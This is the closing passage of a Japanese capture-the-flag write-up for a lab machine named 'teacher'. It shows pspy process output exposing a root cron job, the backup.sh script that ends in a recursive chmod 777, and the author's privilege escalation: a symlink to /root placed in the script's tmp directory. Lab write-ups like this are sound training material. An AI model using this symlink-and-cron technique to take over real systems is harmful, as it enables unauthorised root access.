2020/04/11 10:45:54 CMD: UID=0 PID=28 |
2020/04/11 10:45:54 CMD: UID=0 PID=27 |
2020/04/11 10:45:54 CMD: UID=0 PID=26 |
2020/04/11 10:45:54 CMD: UID=0 PID=25 |
2020/04/11 10:45:54 CMD: UID=0 PID=24 |
2020/04/11 10:45:54 CMD: UID=0 PID=23 |
2020/04/11 10:45:54 CMD: UID=0 PID=229 | /lib/systemd/systemd-udevd
2020/04/11 10:45:54 CMD: UID=0 PID=22 |
2020/04/11 10:45:54 CMD: UID=0 PID=21 |
2020/04/11 10:45:54 CMD: UID=0 PID=202 |
2020/04/11 10:45:54 CMD: UID=0 PID=201 | /usr/bin/vmtoolsd
2020/04/11 10:45:54 CMD: UID=0 PID=2 |
2020/04/11 10:45:54 CMD: UID=0 PID=199 | /lib/systemd/systemd-journald
2020/04/11 10:45:54 CMD: UID=0 PID=19 |
2020/04/11 10:45:54 CMD: UID=0 PID=18 |
2020/04/11 10:45:54 CMD: UID=0 PID=175 |
2020/04/11 10:45:54 CMD: UID=0 PID=174 |
2020/04/11 10:45:54 CMD: UID=0 PID=17 |
2020/04/11 10:45:54 CMD: UID=0 PID=16 |
2020/04/11 10:45:54 CMD: UID=0 PID=15 |
2020/04/11 10:45:54 CMD: UID=0 PID=140 |
2020/04/11 10:45:54 CMD: UID=0 PID=14 |
2020/04/11 10:45:54 CMD: UID=0 PID=138 |
2020/04/11 10:45:54 CMD: UID=0 PID=13 |
2020/04/11 10:45:54 CMD: UID=1000 PID=1291 | ./pspy64
2020/04/11 10:45:54 CMD: UID=0 PID=126 |
2020/04/11 10:45:54 CMD: UID=0 PID=1258 |
2020/04/11 10:45:54 CMD: UID=0 PID=124 |
2020/04/11 10:45:54 CMD: UID=0 PID=1227 |
2020/04/11 10:45:54 CMD: UID=0 PID=122 |
2020/04/11 10:45:54 CMD: UID=0 PID=120 |
2020/04/11 10:45:54 CMD: UID=0 PID=12 |
2020/04/11 10:45:54 CMD: UID=0 PID=118 |
2020/04/11 10:45:54 CMD: UID=0 PID=117 |
2020/04/11 10:45:54 CMD: UID=0 PID=1151 |
2020/04/11 10:45:54 CMD: UID=0 PID=115 |
2020/04/11 10:45:54 CMD: UID=0 PID=114 |
2020/04/11 10:45:54 CMD: UID=0 PID=1102 |
2020/04/11 10:45:54 CMD: UID=0 PID=11 |
2020/04/11 10:45:54 CMD: UID=0 PID=10 |
2020/04/11 10:45:54 CMD: UID=0 PID=1 | /sbin/init
2020/04/11 10:46:01 CMD: UID=0 PID=1299 | /usr/sbin/CRON -f
2020/04/11 10:46:01 CMD: UID=0 PID=1300 | /usr/sbin/CRON -f
2020/04/11 10:46:01 CMD: UID=0 PID=1301 | /bin/sh -c /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0 PID=1302 | /bin/bash /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0 PID=1304 | /bin/sh -c gzip
2020/04/11 10:46:01 CMD: UID=0 PID=1303 | /bin/sh -c gzip
2020/04/11 10:46:01 CMD: UID=0 PID=1305 | /bin/bash /usr/bin/backup.sh
2020/04/11 10:46:01 CMD: UID=0 PID=1306 | tar -xf backup_courses.tar.gz
2020/04/11 10:46:01 CMD: UID=0 PID=1307 | /bin/bash /usr/bin/backup.sh案の定 /usr/bin/backup.sh が実行されていますね
/usr/bin/backup.sh を調べる
giovanni@teacher:/usr/bin$ cat backup.sh
cat backup.sh
## !/bin/bash
cd /home/giovanni/work;
tar -czvf tmp/backup_courses.tar.gz courses/*;
cd tmp;
tar -xf backup_courses.tar.gz;
chmod 777 * -R;中身はこんな感じです
良くあるパターンとしては backup.sh が writeable で書き換えて root に実行させるという感じなのですが、writeable ではありませんでした。
ここで良く見るべきは最後の chmod 777 * -R; ですね。これで tmp 内の全てのファイルの権限を変更しています。
なので、ln コマンドで tmp 内に/root と link したファイルを作ります
giovanni@teacher:~/work/tmp$ ln -s /root hoge
ln -s /root hogeこれで cronjob が実行されるのを少し待ちます
すると
drwxrwxrwx 3 root root 4096 Nov 4 2018 root権限が変更されたのでこれで root.txt を取れます
終わりに
かなりボリューミーな machine で楽しかったです!
色々自力では気づけなかった部分もあるので精進します…!
